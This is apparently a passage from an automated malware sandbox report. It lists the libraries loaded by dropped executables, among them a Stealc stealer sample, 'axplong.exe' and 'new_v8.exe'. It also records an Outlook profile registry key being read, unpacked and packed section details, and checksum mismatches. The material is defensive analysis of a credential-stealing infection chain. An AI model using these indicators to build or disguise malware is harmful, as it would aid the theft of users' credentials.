                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: shfolder.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: riched20.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: usp10.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: msls31.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: dwrite.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: riched20.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: usp10.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: msls31.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: windowscodecs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: file.exeStatic file information: File size 1913856 > 1048576
                          Source: file.exeStatic PE information: Raw size of mahfbdtk is bigger than: 0x100000 < 0x1a1600
                          Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
                          Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
                          Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 6.2.file.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 9.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 10.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 13.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeUnpacked PE file: 42.2.550b7cfe5f.exe.a70000.0.unpack :EW;.rsrc :W;.idata :W;wrsfsivy:EW;bfxftgti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wrsfsivy:EW;bfxftgti:EW;.taggant:EW;
                          Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.cs.Net Code: WaitDelegatesetLatencyMode
                          Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs.Net Code: WaitDelegatesetLatencyMode
                          Source: random[1].exe0.13.drStatic PE information: 0x9C4597AB [Wed Jan 29 23:35:07 2053 UTC]
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00789860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00789860
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: shop[1].exe.13.drStatic PE information: real checksum: 0x0 should be: 0xa36fe
                          Source: shop.exe.13.drStatic PE information: real checksum: 0x0 should be: 0xa36fe
                          Source: c8908bf20d.exe.13.drStatic PE information: real checksum: 0x2142c2 should be: 0x2115c3
                          Source: GOLD1234.exe.13.drStatic PE information: real checksum: 0x0 should be: 0xacdea
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: real checksum: 0x2a786b should be: 0x2a96e2
                          Source: random[1].exe0.13.drStatic PE information: real checksum: 0x0 should be: 0x86b26
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: real checksum: 0x1df3c9 should be: 0x1dd90c
                          Source: 550b7cfe5f.exe.13.drStatic PE information: real checksum: 0x2ecf7f should be: 0x2e75f0
                          Source: axplong.exe.6.drStatic PE information: real checksum: 0x1d48a6 should be: 0x1dd6b2
                          Source: random[1].exe1.13.drStatic PE information: real checksum: 0x2ecf7f should be: 0x2e75f0
                          Source: f55899dae2.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x86b26
                          Source: random[2].exe.13.drStatic PE information: real checksum: 0x2142c2 should be: 0x2115c3
                          Source: random[1].exe.13.drStatic PE information: real checksum: 0x2bfef4 should be: 0x2c40af
                          Source: stealc_default2.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x516aa
                          Source: RDX123456[1].exe.13.drStatic PE information: real checksum: 0x0 should be: 0x5876f
                          Source: GOLD1234[1].exe.13.drStatic PE information: real checksum: 0x0 should be: 0xacdea
                          Source: stealc_default2[1].exe.13.drStatic PE information: real checksum: 0x0 should be: 0x516aa
                          Source: RDX123456.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x5876f
                          Source: Application.exe.33.drStatic PE information: real checksum: 0x0 should be: 0x86b26
                          Source: file.exeStatic PE information: real checksum: 0x1d48a6 should be: 0x1dd6b2
                          Source: 2dc588f7b5.exe.13.drStatic PE information: real checksum: 0x2bfef4 should be: 0x2c40af
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: mahfbdtk
                          Source: file.exeStatic PE information: section name: akwexcdv
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: axplong.exe.6.drStatic PE information: section name:
                          Source: axplong.exe.6.drStatic PE information: section name: .idata
                          Source: axplong.exe.6.drStatic PE information: section name:
                          Source: axplong.exe.6.drStatic PE information: section name: mahfbdtk
                          Source: axplong.exe.6.drStatic PE information: section name: akwexcdv
                          Source: axplong.exe.6.drStatic PE information: section name: .taggant
                          Source: random[2].exe.13.drStatic PE information: section name:
                          Source: random[2].exe.13.drStatic PE information: section name: .rsrc
                          Source: random[2].exe.13.drStatic PE information: section name: .idata
                          Source: random[2].exe.13.drStatic PE information: section name:
                          Source: random[2].exe.13.drStatic PE information: section name: cbbjugzk
                          Source: random[2].exe.13.drStatic PE information: section name: lfmofsyx
                          Source: random[2].exe.13.drStatic PE information: section name: .taggant
                          Source: c8908bf20d.exe.13.drStatic PE information: section name:
                          Source: c8908bf20d.exe.13.drStatic PE information: section name: .rsrc
                          Source: c8908bf20d.exe.13.drStatic PE information: section name: .idata
                          Source: c8908bf20d.exe.13.drStatic PE information: section name:
                          Source: c8908bf20d.exe.13.drStatic PE information: section name: cbbjugzk
                          Source: c8908bf20d.exe.13.drStatic PE information: section name: lfmofsyx
                          Source: c8908bf20d.exe.13.drStatic PE information: section name: .taggant
                          Source: random[1].exe.13.drStatic PE information: section name:
                          Source: random[1].exe.13.drStatic PE information: section name: .idata
                          Source: random[1].exe.13.drStatic PE information: section name: wjqxmzgq
                          Source: random[1].exe.13.drStatic PE information: section name: xobrrexd
                          Source: random[1].exe.13.drStatic PE information: section name: .taggant
                          Source: 2dc588f7b5.exe.13.drStatic PE information: section name:
                          Source: 2dc588f7b5.exe.13.drStatic PE information: section name: .idata
                          Source: 2dc588f7b5.exe.13.drStatic PE information: section name: wjqxmzgq
                          Source: 2dc588f7b5.exe.13.drStatic PE information: section name: xobrrexd
                          Source: 2dc588f7b5.exe.13.drStatic PE information: section name: .taggant
                          Source: Offnewhere[1].exe.13.drStatic PE information: section name: .eh_fram
                          Source: Offnewhere.exe.13.drStatic PE information: section name: .eh_fram
                          Source: new_v8[1].exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8[1].exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8[1].exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8.exe.13.drStatic PE information: section name: .vmp+
                          Source: new_v8.exe.13.drStatic PE information: section name: .vmp+
